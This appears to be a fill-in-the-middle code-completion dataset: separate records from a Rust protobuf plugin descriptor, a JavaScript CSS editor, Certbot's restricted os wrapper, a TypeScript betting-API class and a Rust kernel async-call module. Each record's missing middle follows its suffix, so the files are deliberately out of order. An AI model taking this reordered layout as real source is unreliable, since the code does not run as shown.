CodeInfo\"8\n\x07Feature\x12\x10\n\x0cFEATURE_NONE\x10\0\x12\x1b\n\x17FE\
ATURE_PROTO3_OPTIONAL\x10\x01BW\n\x1ccom.google.protobuf.compilerB\x0cPl\
uginProtosZ)google.golang.org/protobuf/types/pluginpbJ\xf9C\n\x07\x12\
\x05.\0\xb6\x01\x01\n\xca\x11\n\x01\x0c\x12\x03.\0\x122\xc1\x0c\x20Proto\
col\x20Buffers\x20-\x20Google's\x20data\x20interchange\x20format\n\x20Co\
pyright\x202008\x20Google\x20Inc.\x20\x20All\x20rights\x20reserved.\n\
\x20https://developers.google.com/protocol-buffers/\n\n\x20Redistributio\
n\x20and\x20use\x20in\x20source\x20and\x20binary\x20forms,\x20with\x20or\
\x20without\n\x20modification,\x20are\x20permitted\x20provided\x20that\
\x20the\x20following\x20conditions\x20are\n\x20met:\n\n\x20\x20\x20\x20\
\x20*\x20Redistributions\x20of\x20source\x20code\x20must\x20retain\x20th\
e\x20above\x20copyright\n\x20notice,\x20this\x20list\x20of\x20conditions\
\x20and\x20the\x20following\x20disclaimer.\n\x20\x20\x20\x20\x20*\x20Red\
istributions\x20in\x20binary\x20form\x20must\x20reproduce\x20the\x20abov\
e\n\x20copyright\x20notice,\x20this\x20list\x20of\x20conditions\x20and\
\x20the\x20following\x20disclaimer\n\x20in\x20the\x20documentation\x20an\
d/or\x20other\x20materials\x20provided\x20with\x20the\n\x20distribution.\
\n\x20\x20\x20\x20\x20*\x20Neither\x20the\x20name\x20of\x20Google\x20Inc\
.\x20nor\x20the\x20names\x20of\x20its\n\x20contributors\x20may\x20be\x20\
used\x20to\x20endorse\x20or\x20promote\x20products\x20derived\x20from\n\
\x20this\x20software\x20without\x20specific\x20prior\x20written\x20permi\
ssion.\n\n\x20THIS\x20SOFTWARE\x20IS\x20PROVIDED\x20BY\x20THE\x20COPYRIG\
HT\x20HOLDERS\x20AND\x20CONTRIBUTORS\n\x20\"AS\x20IS\"\x20AND\x20ANY\x20\
EXPRESS\x20OR\x20IMPLIED\x20WARRANTIES,\x20INCLUDING,\x20BUT\x20NOT\n\
\x20LIMITED\x20TO,\x20THE\x20IMPLIED\x20WARRANTIES\x20OF\x20MERCHANTABIL\
ITY\x20AND\x20FITNESS\x20FOR\n\x20A\x20PARTICULAR\x20PURPOSE\x20ARE\x20D\
ISCLAIMED.\x20IN\x20NO\x20EVENT\x20SHALL\x20THE\x20COPYRIGHT\n\x20OWNER\
\x20OR\x20CONTRIBUTORS\x20BE\x20LIABLE\x20FOR\x20ANY\x20DIRECT,\x20INDIR\
ECT,\x20INCIDENTAL,\n\x20SPECIAL,\x20EXEMPLARY,\x20OR\x20CONSEQUENTIAL\
\x20DAMAGES\x20(INCLUDING,\x20BUT\x20NOT\n\x20LIMITED\x20TO,\x20PROCUREM\
ENT\x20OF\x20SUBSTITUTE\x20GOODS\x20OR\x20SERVICES;\x20LOSS\x20OF\x20USE\
,\n\x20DATA,\x20OR\x20PROFITS;\x20OR\x20BUSINESS\x20INTERRUPTION)\x20HOW\
EVER\x20CAUSED\x20AND\x20ON\x20ANY\n\x20THEORY\x20OF\x20LIABILITY,\x20WH\
ETHER\x20IN\x20CONTRACT,\x20STRICT\x20LIABILITY,\x20OR\x20TORT\n\x20(INC\
LUDING\x20NEGLIGENCE\x20OR\x20OTHERWISE)\x20ARISING\x20IN\x20ANY\x20WAY\
\x20OUT\x20OF\x20THE\x20USE\n\x20OF\x20THIS\x20SOFTWARE,\x20EVEN\x20IF\
\x20ADVISED\x20OF\x20THE\x20POSSIBILITY\x20OF\x20SUCH\x20DAMAGE.\n2\xfb\
\x04\x20Author:\[email protected]\x20(Kenton\x20Varda)\n\n\x20WARNING\
:\x20\x20The\x20plugin\x20interface\x20is\x20currently\x20EXPERIMENTAL\
\x20and\x20is\x20subject\x20to\n\x20\x20\x20change.\n\n\x20protoc\x20(ak\
a\x20the\x20Protocol\x20Compiler)\x20can\x20be\x20extended\x20via\x20plu\
gins.\x20\x20A\x20plugin\x20is\n\x20just\x20a\x20program\x20that\x20read\
s\x20a\x20CodeGeneratorRequest\x20from\x20stdin\x20and\x20writes\x20a\n\
\x20CodeGeneratorResponse\x20to\x20stdout.\n\n\x20Plugins\x20written\x20\
using\x20C++\x20can\x20use\x20google/protobuf/compiler/plugin.h\x20inste\
ad\n\x20of\x20dealing\x20with\x20the\x20raw\x20protocol\x20defined\x20he\
re.\n\n\x20A\x20plugin\x20executable\x20needs\x20only\x20to\x20be\x20pla\
ced\x20somewhere\x20in\x20the\x20path.\x20\x20The\n\x20plugin\x20should\
\x20be\x20named\x20\"protoc-gen-$NAME\",\x20and\x20will\x20then\x20be\
\x20used\x20when\x20the\n\x20flag\x20\"--${NAME}_out\"\x20is\x20passed\
\x20to\x20protoc.\n\n\x08\n\x01\x02\x12\x030\0!\n\x08\n\x01\x08\x12\x031\
\05\n\t\n\x02\x08\x01\x12\x031\05\n\x08\n\x01\x08\x12\x032\0-\n\t\n\x02\
\x08\x08\x12\x032\0-\n\x08\n\x01\x08\x12\x034\0@\n\t\n\x02\x08\x0b\x12\
\x034\0@\n\t\n\x02\x03\0\x12\x036\0*\n6\n\x02\x04\0\x12\x049\0@\x01\x1a*\
\x20The\x20version\x20number\x20of\x20protocol\x20compiler.\n\n\n\n\x03\
\x04\0\x01\x12\x039\x08\x0f\n\x0b\n\x04\x04\0\x02\0\x12\x03:\x02\x1b\n\
\x0c\n\x05\x04\0\x02\0\x04\x12\x03:\x02\n\n\x0c\n\x05\x04\0\x02\0\x05\
\x12\x03:\x0b\x10\n\x0c\n\x05\x04\0\x02\0\x01\x12\x03:\x11\x16\n\x0c\n\
\x05\x04\0\x02\0\x03\x12\x03:\x19\x1a\n\x0b\n\x04\x04\0\x02\x01\x12\x03;\
\x02\x1b\n\x0c\n\x05\x04\0\x02\x01\x04\x12\x03;\x02\n\n\x0c\n\x05\x04\0\
\x02\x01\x05\x12\x03;\x0b\x10\n\x0c\n\x05\x04\0\x02\x01\x01\x12\x03;\x11\
\x16\n\x0c\n\x05\x04\0\x02\x01\x03\x12\x03;\x19\x1a\n\x0b\n\x04\x04\0\
\x02\x02\x12\x03<\x02\x1b\n\x0c\n\x05\x04\0\x02\x02\x04\x12\x03<\x02\n\n\
\x0c\n\x05\x04\0\x02\x02\x05\x12\x03<\x0b\x10\n\x0c\n\x05\x04\0\x02\x02\
\x01\x12\x03<\x11\x16\n\x0c\n\x05\x04\0\x02\x02\x03\x12\x03<\x19\x1a\n\
\x80\x01\n\x04\x04\0\x02\x03\x12\x03?\x02\x1d\x1as\x20A\x20suffix\x20for\
\x20alpha,\x20beta\x20or\x20rc\x20release,\x20e.g.,\x20\"alpha-1\",\x20\
\"rc2\".\x20It\x20should\n\x20be\x20empty\x20for\x20mainline\x20stable\
\x20releases.\n\n\x0c\n\x05\x04\0\x02\x03\x04\x12\x03?\x02\n\n\x0c\n\x05\
\x04\0\x02\x03\x05\x12\x03?\x0b\x11\n\x0c\n\x05\x04\0\x02\x03\x01\x12\
\x03?\x12\x18\n\x0c\n\x05\x04\0\x02\x03\x03\x12\x03?\x1b\x1c\nO\n\x02\
\x04\x01\x12\x04C\0_\x01\x1aC\x20An\x20encoded\x20CodeGeneratorRequest\
\x20is\x20written\x20to\x20the\x20plugin's\x20stdin.\n\n\n\n\x03\x04\x01\
\x01\x12\x03C\x08\x1c\n\xd1\x01\n\x04\x04\x01\x02\0\x12\x03G\x02'\x1a\
\xc3\x01\x20The\x20.proto\x20files\x20that\x20were\x20explicitly\x20list\
ed\x20on\x20the\x20command-line.\x20\x20The\n\x20code\x20generator\x20sh\
ould\x20generate\x20code\x20only\x20for\x20these\x20files.\x20\x20Each\
\x20file's\n\x20descriptor\x20will\x20be\x20included\x20in\x20proto_file\
,\x20below.\n\n\x0c\n\x05\x04\x01\x02\0\x04\x12\x03G\x02\n\n\x0c\n\x05\
\x04\x01\x02\0\x05\x12\x03G\x0b\x11\n\x0c\n\x05\x04\x01\x02\0\x01\x12\
\x03G\x12\"\n\x0c\n\x05\x04\x01\x02\0\x03\x12\x03G%&\nB\n\x04\x04\x01\
\x02\x01\x12\x03J\x02\x20\x1a5\x20The\x20generator\x20parameter\x20passe\
d\x20on\x20the\x20command-line.\n\n\x0c\n\x05\x04\x01\x02\x01\x04\x12\
\x03J\x02\n\n\x0c\n\x05\x04\x01\x02\x01\x05\x12\x03J\x0b\x11\n\x0c\n\x05\
\x04\x01\x02\x01\x01\x12\x03J\x12\x1b\n\x0c\n\x05\x04\x01\x02\x01\x03\
\x12\x03J\x1e\x1f\n\x87\x06\n\x04\x04\x01\x02\x02\x12\x03Z\x02/\x1a\xf9\
\x05\x20FileDescriptorProtos\x20for\x20all\x20files\x20in\x20files_to_ge\
nerate\x20and\x20everything\n\x20they\x20import.\x20\x20The\x20files\x20\
will\x20appear\x20in\x20topological\x20order,\x20so\x20each\x20file\n\
\x20appears\x20before\x20any\x20file\x20that\x20imports\x20it.\n\n\x20pr\
otoc\x20guarantees\x20that\x20all\x20proto_files\x20will\x20be\x20writte\
n\x20after\n\x20the\x20fields\x20above,\x20even\x20though\x20this\x20is\
\x20not\x20technically\x20guaranteed\x20by\x20the\n\x20protobuf\x20wire\
\x20format.\x20\x20This\x20theoretically\x20could\x20allow\x20a\x20plugi\
n\x20to\x20stream\n\x20in\x20the\x20FileDescriptorProtos\x20and\x20handl\
e\x20them\x20one\x20by\x20one\x20rather\x20than\x20read\n\x20the\x20enti\
re\x20set\x20into\x20memory\x20at\x20once.\x20\x20However,\x20as\x20of\
\x20this\x20writing,\x20this\n\x20is\x20not\x20similarly\x20optimized\
\x20on\x20protoc's\x20end\x20--\x20it\x20will\x20store\x20all\x20fields\
\x20in\n\x20memory\x20at\x20once\x20before\x20sending\x20them\x20to\x20t\
he\x20plugin.\n\n\x20Type\x20names\x20of\x20fields\x20and\x20extensions\
\x20in\x20the\x20FileDescriptorProto\x20are\x20always\n\x20fully\x20qual\
ified.\n\n\x0c\n\x05\x04\x01\x02\x02\x04\x12\x03Z\x02\n\n\x0c\n\x05\x04\
\x01\x02\x02\x06\x12\x03Z\x0b\x1e\n\x0c\n\x05\x04\x01\x02\x02\x01\x12\
\x03Z\x1f)\n\x0c\n\x05\x04\x01\x02\x02\x03\x12\x03Z,.\n7\n\x04\x04\x01\
\x02\x03\x12\x03]\x02(\x1a*\x20The\x20version\x20number\x20of\x20protoco\
l\x20compiler.\n\n\x0c\n\x05\x04\x01\x02\x03\x04\x12\x03]\x02\n\n\x0c\n\
\x05\x04\x01\x02\x03\x06\x12\x03]\x0b\x12\n\x0c\n\x05\x04\x01\x02\x03\
\x01\x12\x03]\x13#\n\x0c\n\x05\x04\x01\x02\x03\x03\x12\x03]&'\nL\n\x02\
\x04\x02\x12\x05b\0\xb6\x01\x01\x1a?\x20The\x20plugin\x20writes\x20an\
\x20encoded\x20CodeGeneratorResponse\x20to\x20stdout.\n\n\n\n\x03\x04\
\x02\x01\x12\x03b\x08\x1d\n\xed\x03\n\x04\x04\x02\x02\0\x12\x03k\x02\x1c\
\x1a\xdf\x03\x20Error\x20message.\x20\x20If\x20non-empty,\x20code\x20gen\
eration\x20failed.\x20\x20The\x20plugin\x20process\n\x20should\x20exit\
\x20with\x20status\x20code\x20zero\x20even\x20if\x20it\x20reports\x20an\
\x20error\x20in\x20this\x20way.\n\n\x20This\x20should\x20be\x20used\x20t\
o\x20indicate\x20errors\x20in\x20.proto\x20files\x20which\x20prevent\x20\
the\n\x20code\x20generator\x20from\x20generating\x20correct\x20code.\x20\
\x20Errors\x20which\x20indicate\x20a\n\x20problem\x20in\x20protoc\x20its\
elf\x20--\x20such\x20as\x20the\x20input\x20CodeGeneratorRequest\x20being\
\n\x20unparseable\x20--\x20should\x20be\x20reported\x20by\x20writing\x20\
a\x20message\x20to\x20stderr\x20and\n\x20exiting\x20with\x20a\x20non-zer\
o\x20status\x20code.\n\n\x0c\n\x05\x04\x02\x02\0\x04\x12\x03k\x02\n\n\
\x0c\n\x05\x04\x02\x02\0\x05\x12\x03k\x0b\x11\n\x0c\n\x05\x04\x02\x02\0\
\x01\x12\x03k\x12\x17\n\x0c\n\x05\x04\x02\x02\0\x03\x12\x03k\x1a\x1b\n\
\x89\x01\n\x04\x04\x02\x02\x01\x12\x03o\x02)\x1a|\x20A\x20bitmask\x20of\
\x20supported\x20features\x20that\x20the\x20code\x20generator\x20support\
s.\n\x20This\x20is\x20a\x20bitwise\x20\"or\"\x20of\x20values\x20from\x20\
the\x20Feature\x20enum.\n\n\x0c\n\x05\x04\x02\x02\x01\x04\x12\x03o\x02\n\
\n\x0c\n\x05\x04\x02\x02\x01\x05\x12\x03o\x0b\x11\n\x0c\n\x05\x04\x02\
\x02\x01\x01\x12\x03o\x12$\n\x0c\n\x05\x04\x02\x02\x01\x03\x12\x03o'(\n+\
\n\x04\x04\x02\x04\0\x12\x04r\x02u\x03\x1a\x1d\x20Sync\x20with\x20code_g\
enerator.h.\n\n\x0c\n\x05\x04\x02\x04\0\x01\x12\x03r\x07\x0e\n\r\n\x06\
\x04\x02\x04\0\x02\0\x12\x03s\x04\x15\n\x0e\n\x07\x04\x02\x04\0\x02\0\
\x01\x12\x03s\x04\x10\n\x0e\n\x07\x04\x02\x04\0\x02\0\x02\x12\x03s\x13\
\x14\n\r\n\x06\x04\x02\x04\0\x02\x01\x12\x03t\x04\x20\n\x0e\n\x07\x04\
\x02\x04\0\x02\x01\x01\x12\x03t\x04\x1b\n\x0e\n\x07\x04\x02\x04\0\x02\
\x01\x02\x12\x03t\x1e\x1f\n4\n\x04\x04\x02\x03\0\x12\x05x\x02\xb4\x01\
\x03\x1a%\x20Represents\x20a\x20single\x20generated\x20file.\n\n\x0c\n\
\x05\x04\x02\x03\0\x01\x12\x03x\n\x0e\n\xae\x05\n\x06\x04\x02\x03\0\x02\
\0\x12\x04\x84\x01\x04\x1d\x1a\x9d\x05\x20The\x20file\x20name,\x20relati\
ve\x20to\x20the\x20output\x20directory.\x20\x20The\x20name\x20must\x20no\
t\n\x20contain\x20\".\"\x20or\x20\"..\"\x20components\x20and\x20must\x20\ | \n\n\x20If\x20the\x20name\x20is\x20omitted,\x20the\x20content\x20will\
\x20be\x20appended\x20to\x20the\x20previous\n\x20file.\x20\x20This\x20al\
lows\x20the\x20generator\x20to\x20break\x20large\x20files\x20into\x20sma\
ll\x20chunks,\n\x20and\x20allows\x20the\x20generated\x20text\x20to\x20be\
\x20streamed\x20back\x20to\x20protoc\x20so\x20that\x20large\n\x20files\
\x20need\x20not\x20reside\x20completely\x20in\x20memory\x20at\x20one\x20\
time.\x20\x20Note\x20that\x20as\x20of\n\x20this\x20writing\x20protoc\x20\
does\x20not\x20optimize\x20for\x20this\x20--\x20it\x20will\x20read\x20th\
e\x20entire\n\x20CodeGeneratorResponse\x20before\x20writing\x20files\x20\
to\x20disk.\n\n\x0f\n\x07\x04\x02\x03\0\x02\0\x04\x12\x04\x84\x01\x04\
\x0c\n\x0f\n\x07\x04\x02\x03\0\x02\0\x05\x12\x04\x84\x01\r\x13\n\x0f\n\
\x07\x04\x02\x03\0\x02\0\x01\x12\x04\x84\x01\x14\x18\n\x0f\n\x07\x04\x02\
\x03\0\x02\0\x03\x12\x04\x84\x01\x1b\x1c\n\xae\x10\n\x06\x04\x02\x03\0\
\x02\x01\x12\x04\xab\x01\x04(\x1a\x9d\x10\x20If\x20non-empty,\x20indicat\
es\x20that\x20the\x20named\x20file\x20should\x20already\x20exist,\x20and\
\x20the\n\x20content\x20here\x20is\x20to\x20be\x20inserted\x20into\x20th\
at\x20file\x20at\x20a\x20defined\x20insertion\n\x20point.\x20\x20This\
\x20feature\x20allows\x20a\x20code\x20generator\x20to\x20extend\x20the\
\x20output\n\x20produced\x20by\x20another\x20code\x20generator.\x20\x20T\
he\x20original\x20generator\x20may\x20provide\n\x20insertion\x20points\
\x20by\x20placing\x20special\x20annotations\x20in\x20the\x20file\x20that\
\x20look\n\x20like:\n\x20\x20\x20@@protoc_insertion_point(NAME)\n\x20The\
\x20annotation\x20can\x20have\x20arbitrary\x20text\x20before\x20and\x20a\
fter\x20it\x20on\x20the\x20line,\n\x20which\x20allows\x20it\x20to\x20be\
\x20placed\x20in\x20a\x20comment.\x20\x20NAME\x20should\x20be\x20replace\
d\x20with\n\x20an\x20identifier\x20naming\x20the\x20point\x20--\x20this\
\x20is\x20what\x20other\x20generators\x20will\x20use\n\x20as\x20the\x20i\
nsertion_point.\x20\x20Code\x20inserted\x20at\x20this\x20point\x20will\
\x20be\x20placed\n\x20immediately\x20above\x20the\x20line\x20containing\
\x20the\x20insertion\x20point\x20(thus\x20multiple\n\x20insertions\x20to\
\x20the\x20same\x20point\x20will\x20come\x20out\x20in\x20the\x20order\
\x20they\x20were\x20added).\n\x20The\x20double-@\x20is\x20intended\x20to\
\x20make\x20it\x20unlikely\x20that\x20the\x20generated\x20code\n\x20coul\
d\x20contain\x20things\x20that\x20look\x20like\x20insertion\x20points\
\x20by\x20accident.\n\n\x20For\x20example,\x20the\x20C++\x20code\x20gene\
rator\x20places\x20the\x20following\x20line\x20in\x20the\n\x20.pb.h\x20f\
iles\x20that\x20it\x20generates:\n\x20\x20\x20//\x20@@protoc_insertion_p\
oint(namespace_scope)\n\x20This\x20line\x20appears\x20within\x20the\x20s\
cope\x20of\x20the\x20file's\x20package\x20namespace,\x20but\n\x20outside\
\x20of\x20any\x20particular\x20class.\x20\x20Another\x20plugin\x20can\
\x20then\x20specify\x20the\n\x20insertion_point\x20\"namespace_scope\"\
\x20to\x20generate\x20additional\x20classes\x20or\n\x20other\x20declarat\
ions\x20that\x20should\x20be\x20placed\x20in\x20this\x20scope.\n\n\x20No\
te\x20that\x20if\x20the\x20line\x20containing\x20the\x20insertion\x20poi\
nt\x20begins\x20with\n\x20whitespace,\x20the\x20same\x20whitespace\x20wi\
ll\x20be\x20added\x20to\x20every\x20line\x20of\x20the\n\x20inserted\x20t\
ext.\x20\x20This\x20is\x20useful\x20for\x20languages\x20like\x20Python,\
\x20where\n\x20indentation\x20matters.\x20\x20In\x20these\x20languages,\
\x20the\x20insertion\x20point\x20comment\n\x20should\x20be\x20indented\
\x20the\x20same\x20amount\x20as\x20any\x20inserted\x20code\x20will\x20ne\
ed\x20to\x20be\n\x20in\x20order\x20to\x20work\x20correctly\x20in\x20that\
\x20context.\n\n\x20The\x20code\x20generator\x20that\x20generates\x20the\
\x20initial\x20file\x20and\x20the\x20one\x20which\n\x20inserts\x20into\
\x20it\x20must\x20both\x20run\x20as\x20part\x20of\x20a\x20single\x20invo\
cation\x20of\x20protoc.\n\x20Code\x20generators\x20are\x20executed\x20in\
\x20the\x20order\x20in\x20which\x20they\x20appear\x20on\x20the\n\x20comm\
and\x20line.\n\n\x20If\x20|insertion_point|\x20is\x20present,\x20|name|\
\x20must\x20also\x20be\x20present.\n\n\x0f\n\x07\x04\x02\x03\0\x02\x01\
\x04\x12\x04\xab\x01\x04\x0c\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x05\x12\
\x04\xab\x01\r\x13\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x01\x12\x04\xab\x01\
\x14#\n\x0f\n\x07\x04\x02\x03\0\x02\x01\x03\x12\x04\xab\x01&'\n$\n\x06\
\x04\x02\x03\0\x02\x02\x12\x04\xae\x01\x04!\x1a\x14\x20The\x20file\x20co\
ntents.\n\n\x0f\n\x07\x04\x02\x03\0\x02\x02\x04\x12\x04\xae\x01\x04\x0c\
\n\x0f\n\x07\x04\x02\x03\0\x02\x02\x05\x12\x04\xae\x01\r\x13\n\x0f\n\x07\
\x04\x02\x03\0\x02\x02\x01\x12\x04\xae\x01\x14\x1b\n\x0f\n\x07\x04\x02\
\x03\0\x02\x02\x03\x12\x04\xae\x01\x1e\x20\n\xe1\x01\n\x06\x04\x02\x03\0\
\x02\x03\x12\x04\xb3\x01\x048\x1a\xd0\x01\x20Information\x20describing\
\x20the\x20file\x20content\x20being\x20inserted.\x20If\x20an\x20insertio\
n\n\x20point\x20is\x20used,\x20this\x20information\x20will\x20be\x20appr\
opriately\x20offset\x20and\x20inserted\n\x20into\x20the\x20code\x20gener\
ation\x20metadata\x20for\x20the\x20generated\x20files.\n\n\x0f\n\x07\x04\
\x02\x03\0\x02\x03\x04\x12\x04\xb3\x01\x04\x0c\n\x0f\n\x07\x04\x02\x03\0\
\x02\x03\x06\x12\x04\xb3\x01\r\x1e\n\x0f\n\x07\x04\x02\x03\0\x02\x03\x01\
\x12\x04\xb3\x01\x1f2\n\x0f\n\x07\x04\x02\x03\0\x02\x03\x03\x12\x04\xb3\
\x0157\n\x0c\n\x04\x04\x02\x02\x02\x12\x04\xb5\x01\x02\x1a\n\r\n\x05\x04\
\x02\x02\x02\x04\x12\x04\xb5\x01\x02\n\n\r\n\x05\x04\x02\x02\x02\x06\x12\
\x04\xb5\x01\x0b\x0f\n\r\n\x05\x04\x02\x02\x02\x01\x12\x04\xb5\x01\x10\
\x14\n\r\n\x05\x04\x02\x02\x02\x03\x12\x04\xb5\x01\x17\x19\
";
/// `FileDescriptorProto` object which was a source for this generated file
pub fn file_descriptor_proto() -> &'static crate::descriptor::FileDescriptorProto {
static file_descriptor_proto_lazy: crate::rt::LazyV2<crate::descriptor::FileDescriptorProto> = crate::rt::LazyV2::INIT;
file_descriptor_proto_lazy.get(|| {
crate::Message::parse_from_bytes(file_descriptor_proto_data).unwrap()
})
}
/// `FileDescriptor` object which allows dynamic access to files
pub fn file_descriptor() -> crate::reflect::FileDescriptor {
static file_descriptor_lazy: crate::rt::LazyV2<crate::reflect::GeneratedFileDescriptor> = crate::rt::LazyV2::INIT;
let file_descriptor = file_descriptor_lazy.get(|| {
let mut deps = ::std::vec::Vec::new();
deps.push(crate::descriptor::file_descriptor());
let mut messages = ::std::vec::Vec::new();
messages.push(Version::generated_message_descriptor_data());
messages.push(CodeGeneratorRequest::generated_message_descriptor_data());
messages.push(CodeGeneratorResponse::generated_message_descriptor_data());
messages.push(code_generator_response::File::generated_message_descriptor_data());
let mut enums = ::std::vec::Vec::new();
enums.push(code_generator_response::Feature::generated_enum_descriptor_data());
crate::reflect::GeneratedFileDescriptor::new_generated(
file_descriptor_proto(),
deps,
messages,
enums,
)
});
crate::reflect::FileDescriptor::new_generated_2(file_descriptor)
} | be\x20relative,\x20not\x20be\x20absolute\x20(so,\n\x20the\x20file\x20can\
not\x20lie\x20outside\x20the\x20output\x20directory).\x20\x20\"/\"\x20mu\
st\x20be\x20used\x20as\n\x20the\x20path\x20separator,\x20not\x20\"\\\".\ |
edit_css.js | // var nub =document.getElementsByClassName("dropdown-item edit_img").length;
// console.log(nub);
// console.log(img_edit_btn);
// for(var i=0 ;i < nub;i++)
// {
// img_edit_btn.setAttribute("data_imgedit_id",i);
// }
function edit_css(){
var form_w= document.getElementById("css_edit_width");
var form_h= document.getElementById("css_edit_height");
img_x.style.width=form_w.value;
img_x.style.height=form_h.value;
}
function updata_h1(){ |
} | var form_h1_value = document.getElementById("css_edit_h1"); |
os.py | """
This compat modules is a wrapper of the core os module that forbids usage of specific operations
(e.g. chown, chmod, getuid) that would be harmful to the Windows file security model of Certbot.
This module is intended to replace standard os module throughout certbot projects (except acme).
"""
# pylint: disable=function-redefined
from __future__ import absolute_import
# First round of wrapping: we import statically all public attributes exposed by the os module
# This allows in particular to have pylint, mypy, IDEs be aware that most of os members are
# available in certbot.compat.os.
from os import * # type: ignore # pylint: disable=wildcard-import,unused-wildcard-import,redefined-builtin,os-module-forbidden
# Second round of wrapping: we import dynamically all attributes from the os module that have not
# yet been imported by the first round (static import). This covers in particular the case of
# specific python 3.x versions where not all public attributes are in the special __all__ of os,
# and so not in `from os import *`.
import os as std_os # pylint: disable=os-module-forbidden
import sys as std_sys
ourselves = std_sys.modules[__name__]
for attribute in dir(std_os):
# Check if the attribute does not already exist in our module. It could be internal attributes
# of the module (__name__, __doc__), or attributes from standard os already imported with
# `from os import *`.
if not hasattr(ourselves, attribute):
|
# Similar to os.path, allow certbot.compat.os.path to behave as a module
std_sys.modules[__name__ + '.path'] = path
# Clean all remaining importables that are not from the core os module.
del ourselves, std_os, std_sys
# Chmod is the root of all evil for our security model on Windows. With the default implementation
# of os.chmod on Windows, almost all bits on mode will be ignored, and only a general RO or RW will
# be applied. The DACL, the inner mechanism to control file access on Windows, will stay on its
# default definition, giving effectively at least read permissions to any one, as the default
# permissions on root path will be inherit by the file (as NTFS state), and root path can be read
# by anyone. So the given mode needs to be translated into a secured and not inherited DACL that
# will be applied to this file using filesystem.chmod, calling internally the win32security
# module to construct and apply the DACL. Complete security model to translate a POSIX mode into
# a suitable DACL on Windows for Certbot can be found here:
# https://github.com/certbot/certbot/issues/6356
# Basically, it states that appropriate permissions will be set for the owner, nothing for the
# group, appropriate permissions for the "Everyone" group, and all permissions to the
# "Administrators" group + "System" user, as they can do everything anyway.
def chmod(*unused_args, **unused_kwargs): # pylint: disable=function-redefined
"""Method os.chmod() is forbidden"""
raise RuntimeError('Usage of os.chmod() is forbidden. '
'Use certbot.compat.filesystem.chmod() instead.')
# Because of the blocking strategy on file handlers on Windows, rename does not behave as expected
# with POSIX systems: an exception will be raised if dst already exists.
def rename(*unused_args, **unused_kwargs):
"""Method os.rename() is forbidden"""
raise RuntimeError('Usage of os.rename() is forbidden. '
'Use certbot.compat.filesystem.replace() instead.')
# Behavior of os.replace is consistent between Windows and Linux. However, it is not supported on
# Python 2.x. So, as for os.rename, we forbid it in favor of filesystem.replace.
def replace(*unused_args, **unused_kwargs):
"""Method os.replace() is forbidden"""
raise RuntimeError('Usage of os.replace() is forbidden. '
'Use certbot.compat.filesystem.replace() instead.')
| setattr(ourselves, attribute, getattr(std_os, attribute)) |
PriceLadderDescription.ts | /**
* Copyright 2020 Colin Doig. Distributed under the MIT license.
*/
import JsonMember from '../JsonMember';
import PriceLadderType from '../sport/enum/PriceLadderType';
export interface IPriceLadderDescriptionOptions {
type: PriceLadderType | string;
}
export default class PriceLadderDescription extends JsonMember { |
constructor(options: IPriceLadderDescriptionOptions) {
super();
this.type = this.fromJson(options.type, PriceLadderType);
}
public toJson(): IPriceLadderDescriptionOptions {
const json: IPriceLadderDescriptionOptions = {
type: this.type.getValue(),
};
return json;
}
public getType(): PriceLadderType {
return this.type;
}
public setType(type: PriceLadderType): void {
this.type = type;
}
} | private type: PriceLadderType; |
mod.rs | mod fs;
mod structs;
use alloc::{boxed::Box, sync::Arc};
use core::convert::TryFrom;
use core::{
future::Future,
pin::Pin,
task::{Context, Poll},
};
use spin::Mutex;
use crate::arch::cpu;
use crate::config::IO_CPU_ID;
use crate::error::{AcoreError, AcoreResult};
use crate::memory::{
addr::{is_aligned, virt_to_phys},
areas::{PmAreaFixed, VmArea},
MMUFlags, PAGE_SIZE,
};
use crate::sched::yield_now;
use crate::task::{PerCpu, Thread};
use structs::{AsyncCallType, CompletionRingEntry, RequestRingEntry};
pub use structs::{AsyncCallBuffer, AsyncCallInfoUser};
pub struct AsyncCall {
thread: Arc<Thread>,
}
type AsyncCallResult = AcoreResult<usize>;
impl AsyncCall {
pub fn new(thread: Arc<Thread>) -> Self {
Self { thread }
}
pub fn setup(
thread: &Arc<Thread>,
req_capacity: usize,
comp_capacity: usize,
) -> AcoreResult<AsyncCallInfoUser> {
// create shared memory
if thread.owned_res.async_buf.lock().is_some() {
return Err(AcoreError::AlreadyExists);
}
let buf = AsyncCallBuffer::new(req_capacity, comp_capacity)?;
let buf_size = buf.size();
let start_paddr = virt_to_phys(buf.as_ptr::<u8>() as usize);
let end_paddr = start_paddr + buf_size;
debug_assert!(is_aligned(start_paddr));
// push to user's MemorySet
let mut vm = thread.vm.lock();
let pma = PmAreaFixed::new(start_paddr, end_paddr)?;
let user_buf_ptr = vm.find_free_area(PAGE_SIZE, buf_size)?;
let vma = VmArea::new(
user_buf_ptr,
user_buf_ptr + buf_size,
MMUFlags::READ | MMUFlags::WRITE | MMUFlags::USER,
Arc::new(Mutex::new(pma)),
"async_call_buffer",
)?;
vm.push(vma)?;
let info = buf.fill_user_info(user_buf_ptr);
*thread.owned_res.async_buf.lock() = Some(buf);
// spawn async call polling coroutine and notify the I/O CPU
spawn_polling(thread);
Ok(info)
}
async fn do_async_call(&self, req: &RequestRingEntry) -> AsyncCallResult {
if self.thread.is_exited() {
return Err(AcoreError::BadState);
}
let ac_type = match AsyncCallType::try_from(req.opcode) {
Ok(t) => t,
Err(_) => {
error!("invalid async call number: {}", req.opcode);
return Err(AcoreError::InvalidArgs);
}
};
debug!("AsyncCall: {:?} => {:x?}", ac_type, req);
let fd = req.fd as usize;
let flags = req.flags as usize;
let offset = req.offset as usize;
let user_buf_addr = req.user_buf_addr as usize;
let buf_size = req.buf_size as usize;
let ret = match ac_type {
AsyncCallType::Nop => Ok(0),
AsyncCallType::Read => {
self.async_read(fd, user_buf_addr.into(), buf_size, offset)
.await
}
AsyncCallType::Write => {
self.async_write(fd, user_buf_addr.into(), buf_size, offset)
.await
}
AsyncCallType::Open => self.async_open(user_buf_addr.into(), flags).await,
AsyncCallType::Close => self.async_close(fd).await,
_ => {
warn!("asynca call unimplemented: {:?}", ac_type);
Err(AcoreError::NotSupported)
}
};
if ret.is_err() {
warn!("AsyncCall: {:?} <= {:?}", ac_type, ret);
} else {
info!("AsyncCall: {:?} <= {:?}", ac_type, ret);
}
ret
}
async fn polling_once(&self) -> AcoreResult {
let buf_lock = self.thread.owned_res.async_buf.lock();
let buf = match buf_lock.as_ref() {
Some(b) => b,
None => return Err(AcoreError::BadState),
};
debug!("thread {}: {:#x?}", self.thread.id, buf.as_raw());
let mut cached_req_head = buf.read_req_ring_head();
